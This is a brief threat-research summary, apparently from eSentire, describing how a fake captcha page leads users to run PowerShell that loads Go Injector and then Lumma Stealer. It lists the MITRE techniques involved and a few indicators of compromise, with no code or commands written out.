Threat Research

Go Injector: A Pathway to Stealers

Esentire

eSentire’s Threat Response Unit (TRU) detected Go Injector leading to Lumma Stealer through a social-engineered fake captcha page that tricks users into running malicious PowerShell commands. The investigation reveals a sophisticated three-step injection chain and Lumma Stealer’s MaaS operations targeting cryptocurrency wallets and 2FA data, underscoring the need to guard against social engineering tactics. #GoInjector #LummaStealer #LummaC2 #Kaseya #more_eggs #Joesandbox

Keypoints

  • TRU observed Go Injector leading to Lumma Stealer in August 2024.
  • Lumma Stealer operates as Malware-as-a-Service (MaaS) and targets cryptocurrency wallets and 2FA browser extensions.
  • The infection starts on a malicious site displaying a fake captcha that prompts user action.
  • Malicious PowerShell commands download and execute the payloads.
  • Go Injector performs a 3-step injection process to run Lumma Stealer.
  • Decoy and encryption techniques are used (Base64-encoded commands, AES-GCM decryption) to deliver the final payload and conceal activity.
  • Recommendations emphasize social-engineering awareness and continuous IOC monitoring by 24/7 SOC teams.

MITRE Techniques

  • [T1059.001] PowerShell – Used to execute a Base64 encoded command provided to the user via a fake captcha page. ‘Used to execute a Base64 encoded command provided to the user via a fake captcha page.’
  • [T1059] Command and Scripting Interpreter – PowerShell commands were executed to download and extract malicious payloads. ‘PowerShell commands were executed to download and extract malicious payloads.’
  • [T1055] Process Injection – Go Injector uses a process injection technique to execute Lumma Stealer. ‘Go Injector uses a process injection technique to execute Lumma Stealer.’
  • [T1003] Credential Dumping – Lumma Stealer targets sensitive data including cryptocurrency wallets and 2FA browser extensions. ‘Lumma Stealer targets sensitive data including cryptocurrency wallets and 2FA browser extensions.’
  • [T1059.005] VBScript – When decoding the VBScript code, an encoded PowerShell command is present. ‘When decoding the VBScript code, an encoded PowerShell command is present.’

Indicators of Compromise

  • [File Name] Involved artifacts – 0klevgrand.exe, Dialer.exe
  • [MD5] Lumma Stealer module – E372BBE59DC7DA4FDAB393DA71404848
  • [URL] Public analysis reference – https://www.joesandbox.com/analysis/1491044/0/html

Read more: https://www.esentire.com/blog/go-injector-leading-to-stealers

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint